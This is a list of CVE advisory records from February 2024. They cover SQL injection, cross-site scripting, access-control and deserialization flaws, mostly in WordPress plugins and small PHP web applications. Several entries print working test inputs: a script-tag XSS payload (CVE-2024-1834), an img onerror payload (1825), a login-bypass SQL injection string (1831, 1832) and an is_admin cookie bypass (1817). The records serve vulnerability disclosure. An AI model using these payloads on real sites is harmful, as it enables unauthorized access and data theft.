CVE 2024 1844 Candidate The RevivePress – Keep your Old Content Evergreen plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the import_data and copy_data functions in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access or higher, to overwrite plugin settings and view them. MISC:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L148 | URL:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L148 | MISC:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L161 | URL:https://plugins.trac.wordpress.org/browser/wp-auto-republish/trunk/includes/Tools/Database.php#L161 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/63ecb518-50d6-49ad-92e4-c5a7494ced82?source=cve Assigned (20240223)
CVE 2024 1843 Candidate The Auto Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the aalAddLink function in all versions up to, and including, 6.4.3. This makes it possible for authenticated attackers, with subscriber access or higher, to add arbitrary links to posts. MISC:https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_ajax.php#L79 | URL:https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_ajax.php#L79 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve Assigned (20240223)
CVE 2024 1834 Candidate A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as problematic. This affects an unknown part of the file ?page=attendance&class_id=1. The manipulation of the argument class_date with the input 2024-02-23%22%3E%3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254625 was assigned to this vulnerability. MISC:VDB-254625 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254625 | MISC:VDB-254625 | SourceCodester Simple Student Attendance System ?page=attendance&class_id=1 cross site scripting | URL:https://vuldb.com/?id.254625 | MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Simple-Student-Attendance-System.md#2pageattendancexss | URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Simple-Student-Attendance-System.md#2pageattendancexss Assigned (20240223)
CVE 2024 1833 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /Account/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254624. MISC:VDB-254624 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254624 | MISC:VDB-254624 | SourceCodester Employee Management System login.php sql injection | URL:https://vuldb.com/?id.254624 | MISC:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/employee-management-system.md#2accountloginphp | URL:https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/employee-management-system.md#2accountloginphp Assigned (20240223)
CVE 2024 1832 Candidate A vulnerability has been found in SourceCodester Complete File Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ of the component Admin Login Form. The manipulation of the argument username with the input torada%27+or+%271%27+%3D+%271%27+--+- leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254623. MISC:VDB-254623 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254623 | MISC:VDB-254623 | SourceCodester Complete File Management System Admin Login Form sql injection | URL:https://vuldb.com/?id.254623 | MISC:https://toradah.notion.site/SQL-Injection-via-Admin-Login-Form-7372893848cb4bb996ae2c9effb0266a?pvs=25 | URL:https://toradah.notion.site/SQL-Injection-via-Admin-Login-Form-7372893848cb4bb996ae2c9effb0266a?pvs=25 Assigned (20240223)
CVE 2024 1831 Candidate A vulnerability, which was classified as critical, was found in SourceCodester Complete File Management System 1.0. Affected is an unknown function of the file users/index.php of the component Login Form. The manipulation of the argument username with the input torada%27+or+%271%27+%3D+%271%27+--+- leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254622 is the identifier assigned to this vulnerability. MISC:VDB-254622 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254622 | MISC:VDB-254622 | SourceCodester Complete File Management System Login Form index.php sql injection | URL:https://vuldb.com/?id.254622 | MISC:https://toradah.notion.site/Login-Bypass-via-SQL-injection-b1e45264f6104bc696836ade6e60fb98?pvs=4 | URL:https://toradah.notion.site/Login-Bypass-via-SQL-injection-b1e45264f6104bc696836ade6e60fb98?pvs=4 Assigned (20240223)
CVE 2024 1830 Candidate A vulnerability was found in code-projects Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file Source/librarian/user/student/lost-password.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254618 is the identifier assigned to this vulnerability. MISC:VDB-254618 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254618 | MISC:VDB-254618 | code-projects Library System lost-password.php sql injection | URL:https://vuldb.com/?id.254618 | MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.5Library%20System%20In%20PHP%20-%20SQL%20Injection-student_lostpass.md | URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.5Library%20System%20In%20PHP%20-%20SQL%20Injection-student_lostpass.md Assigned (20240223)
CVE 2024 1829 Candidate A vulnerability was found in code-projects Library System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Source/librarian/user/student/registration.php. The manipulation of the argument email/regno/phone/username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254617 was assigned to this vulnerability. MISC:VDB-254617 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254617 | MISC:VDB-254617 | code-projects Library System registration.php sql injection | URL:https://vuldb.com/?id.254617 | MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.4Library%20System%20In%20PHP%20-%20SQL%20Injection-student_reg.md | URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.4Library%20System%20In%20PHP%20-%20SQL%20Injection-student_reg.md Assigned (20240223)
CVE 2024 1828 Candidate A vulnerability was found in code-projects Library System 1.0. It has been classified as critical. Affected is an unknown function of the file Source/librarian/user/teacher/registration.php. The manipulation of the argument email/idno/phone/username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254616. MISC:VDB-254616 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254616 | MISC:VDB-254616 | code-projects Library System registration.php sql injection | URL:https://vuldb.com/?id.254616 | MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.3Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_reg.md | URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.3Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_reg.md Assigned (20240223)
CVE 2024 1827 Candidate A vulnerability was found in code-projects Library System 1.0 and classified as critical. This issue affects some unknown processing of the file Source/librarian/user/teacher/login.php. The manipulation of the argument username/password leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254615. MISC:VDB-254615 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254615 | MISC:VDB-254615 | code-projects Library System login.php sql injection | URL:https://vuldb.com/?id.254615 | MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.2Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_login.md | URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3.2Library%20System%20In%20PHP%20-%20SQL%20Injection-teacher_login.md Assigned (20240223)
CVE 2024 1826 Candidate A vulnerability has been found in code-projects Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file Source/librarian/user/student/login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-254614 is the identifier assigned to this vulnerability. MISC:VDB-254614 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254614 | MISC:VDB-254614 | code-projects Library System login.php sql injection | URL:https://vuldb.com/?id.254614 | MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/3Library%20System%20In%20PHP%20-%20SQL%20Injection-student_login.md | URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/3Library%20System%20In%20PHP%20-%20SQL%20Injection-student_login.md Assigned (20240223)
CVE 2024 1825 Candidate A vulnerability, which was classified as problematic, was found in CodeAstro House Rental Management System 1.0. This affects an unknown part of the component User Registration Page. The manipulation of the argument address with the input <img src="1" onerror="console.log(1)"> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254613 was assigned to this vulnerability. MISC:VDB-254613 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254613 | MISC:VDB-254613 | CodeAstro House Rental Management System User Registration Page cross site scripting | URL:https://vuldb.com/?id.254613 | MISC:https://docs.qq.com/doc/DYndSY3V4UXh4dHFC | URL:https://docs.qq.com/doc/DYndSY3V4UXh4dHFC Assigned (20240223)
CVE 2024 1824 Candidate A vulnerability, which was classified as critical, has been found in CodeAstro House Rental Management System 1.0. Affected by this issue is some unknown functionality of the file signing.php. The manipulation of the argument uname/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254612. MISC:VDB-254612 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254612 | MISC:VDB-254612 | CodeAstro House Rental Management System signing.php sql injection | URL:https://vuldb.com/?id.254612 | MISC:https://docs.qq.com/doc/DYk9QcHVFRENObWtj | URL:https://docs.qq.com/doc/DYk9QcHVFRENObWtj Assigned (20240223)
CVE 2024 1823 Candidate A vulnerability classified as critical was found in CodeAstro Simple Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file users.php of the component Backend. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254611. MISC:VDB-254611 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254611 | MISC:VDB-254611 | CodeAstro Simple Voting System Backend users.php access control | URL:https://vuldb.com/?id.254611 | MISC:https://docs.qq.com/doc/DYll0ZEFKcUdGYlNr | URL:https://docs.qq.com/doc/DYll0ZEFKcUdGYlNr Assigned (20240223)
CVE 2024 1822 Candidate A vulnerability classified as problematic has been found in PHPGurukul Tourism Management System 1.0. Affected is an unknown function of the file user-bookings.php. The manipulation of the argument Full Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254610 is the identifier assigned to this vulnerability. MISC:VDB-254610 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254610 | MISC:VDB-254610 | PHPGurukul Tourism Management System user-bookings.php cross site scripting | URL:https://vuldb.com/?id.254610 | MISC:https://drive.google.com/file/d/1ulzFlRqsex39dDUOFU2LbmphrQblSAwn/view?usp=drive_link | URL:https://drive.google.com/file/d/1ulzFlRqsex39dDUOFU2LbmphrQblSAwn/view?usp=drive_link Assigned (20240223)
CVE 2024 1821 Candidate A vulnerability was found in code-projects Crime Reporting System 1.0. It has been rated as critical. This issue affects some unknown processing of the file police_add.php. The manipulation of the argument police_name/police_id/police_spec/password leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-254609 was assigned to this vulnerability. MISC:VDB-254609 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254609 | MISC:VDB-254609 | code-projects Crime Reporting System police_add.php sql injection | URL:https://vuldb.com/?id.254609 | MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/2Crime%20Reporting%20System%20-%20SQL%20Injection-police_add.md | URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/2Crime%20Reporting%20System%20-%20SQL%20Injection-police_add.md Assigned (20240223)
CVE 2024 1820 Candidate A vulnerability was found in code-projects Crime Reporting System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file inchargelogin.php. The manipulation of the argument email/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254608. MISC:VDB-254608 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254608 | MISC:VDB-254608 | code-projects Crime Reporting System inchargelogin.php sql injection | URL:https://vuldb.com/?id.254608 | MISC:https://github.com/jxp98/VulResearch/blob/main/2024/02/1Crime%20Reporting%20System%20-%20SQL%20Injection.md | URL:https://github.com/jxp98/VulResearch/blob/main/2024/02/1Crime%20Reporting%20System%20-%20SQL%20Injection.md Assigned (20240223)
CVE 2024 1819 Candidate A vulnerability was found in CodeAstro Membership Management System 1.0. It has been classified as critical. This affects an unknown part of the component Add Members Tab. The manipulation of the argument Member Photo leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254607. MISC:VDB-254607 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254607 | MISC:VDB-254607 | CodeAstro Membership Management System Add Members Tab unrestricted upload | URL:https://vuldb.com/?id.254607 | MISC:https://drive.google.com/file/d/12sNvBJ7wYjZ-2NBLdyG4e-L8sOO-zrbK/view?usp=sharing | URL:https://drive.google.com/file/d/12sNvBJ7wYjZ-2NBLdyG4e-L8sOO-zrbK/view?usp=sharing Assigned (20240223)
CVE 2024 1818 Candidate A vulnerability was found in CodeAstro Membership Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /uploads/ of the component Logo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254606 is the identifier assigned to this vulnerability. MISC:VDB-254606 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254606 | MISC:VDB-254606 | CodeAstro Membership Management System Logo unrestricted upload | URL:https://vuldb.com/?id.254606 | MISC:https://drive.google.com/file/d/1EqHqZXfxhNkrDXNfx7wglpxaa5ZlPbx4/view?usp=drive_link | URL:https://drive.google.com/file/d/1EqHqZXfxhNkrDXNfx7wglpxaa5ZlPbx4/view?usp=drive_link Assigned (20240223)
CVE 2024 1817 Candidate A vulnerability has been found in Demososo DM Enterprise Website Building System up to 2022.8 and classified as critical. Affected by this vulnerability is the function dmlogin of the file indexDM_load.php of the component Cookie Handler. The manipulation of the argument is_admin with the input y leads to improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254605 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254605 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.254605 | MISC:VDB-254605 | Demososo DM Enterprise Website Building System Cookie indexDM_load.php dmlogin improper authentication | URL:https://vuldb.com/?id.254605 | MISC:https://note.zhaoj.in/share/8gO8yxJ8aN51 | URL:https://note.zhaoj.in/share/8gO8yxJ8aN51 Assigned (20240223)
CVE 2024 1811 Candidate A potential vulnerability has been identified in OpenText ArcSight Platform. The vulnerability could be remotely exploited. MISC:https://portal.microfocus.com/s/article/KM000027383 | URL:https://portal.microfocus.com/s/article/KM000027383 Assigned (20240222)
CVE 2024 1810 Candidate The Archivist – Custom Archive Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘shortcode_attributes' parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve Assigned (20240222)
CVE 2024 1808 Candidate The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_qrcode' shortcode in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3041647/shortcodes-ultimate | URL:https://plugins.trac.wordpress.org/changeset/3041647/shortcodes-ultimate | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/96769a0e-d4a9-4196-8ded-b600046c0943?source=cve Assigned (20240222)
CVE 2024 1806 Candidate The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.15.0/src/ShortcodeParser/EditProfileTag.php#L76 | URL:https://plugins.trac.wordpress.org/browser/wp-user-avatar/tags/4.15.0/src/ShortcodeParser/EditProfileTag.php#L76 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve Assigned (20240222)
CVE 2024 1802 Candidate The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Wistia embed block in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on the user supplied url. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/48511d1a-2fd5-4be4-8409-e99d4aadcdfe?source=cve Assigned (20240222)
CVE 2024 1801 Candidate In Progress® Telerik® Reporting versions prior to 2024 Q1 (18.0.24.130), a code execution attack is possible by a local threat actor through an insecure deserialization vulnerability. MISC:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856 | URL:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856 | MISC:https://www.telerik.com/products/reporting.aspx | URL:https://www.telerik.com/products/reporting.aspx Assigned (20240222)
CVE 2024 1800 Candidate In Progress® Telerik® Report Server versions prior to 2024 Q1 (10.0.24.130), a remote code execution attack is possible through an insecure deserialization vulnerability. MISC:https://docs.telerik.com/report-server/knowledge-base/deserialization-vulnerability-cve-2024-1800 | URL:https://docs.telerik.com/report-server/knowledge-base/deserialization-vulnerability-cve-2024-1800 | MISC:https://www.telerik.com/report-server | URL:https://www.telerik.com/report-server Assigned (20240222)
CVE 2024 1799 Candidate The GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to SQL Injection via the 'achievement_types' attribute of the gamipress_earnings shortcode in all versions up to, and including, 6.8.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve Assigned (20240222)
CVE 2024 1796 Candidate The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'woof' shortcode in all versions up to, and including, 1.3.5.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'swoof_slug'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve Assigned (20240222)
CVE 2024 1795 Candidate The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to SQL Injection via the 'name' parameter in the woof shortcode in all versions up to, and including, 1.3.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve Assigned (20240222)
CVE 2024 1793 Candidate The AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth plugin for WordPress is vulnerable to SQL Injection via the 'post_id' parameter in all versions up to, and including, 7.3.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://glimmer-handball-dae.notion.site/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4 | URL:https://glimmer-handball-dae.notion.site/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4 | MISC:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L962 | URL:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L962 | MISC:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L970 | URL:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L970 | MISC:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L972 | URL:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L972 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve Assigned (20240222)
CVE 2024 1791 Candidate The CodeMirror Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Code Mirror block in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://wordpress.org/plugins/wp-codemirror-block/ | URL:https://wordpress.org/plugins/wp-codemirror-block/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve Assigned (20240222)
CVE 2024 1788 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-2813. Reason: This candidate is a duplicate of CVE-2023-2813. Notes: All CVE users should reference CVE-2023-2813 instead of this candidate. Assigned (20240222)
CVE 2024 1787 Candidate The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'update_rewards_fuel_api_key' parameter in all versions up to, and including, 2.0.64 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9eeec949-e440-4df3-8c26-db92498cada3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9eeec949-e440-4df3-8c26-db92498cada3?source=cve Assigned (20240222)
CVE 2024 1786 Candidate ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DIR-600M C1 3.08. Affected by this issue is some unknown functionality of the component Telnet Service. The manipulation of the argument username leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254576. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. MISC:VDB-254576 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.254576 | MISC:VDB-254576 | D-Link DIR-600M C1 Telnet Service buffer overflow | URL:https://vuldb.com/?id.254576 | MISC:https://gist.github.com/dmknght/269d90e17713bbd34e48c50f5c5284a2 | URL:https://gist.github.com/dmknght/269d90e17713bbd34e48c50f5c5284a2 Assigned (20240222)
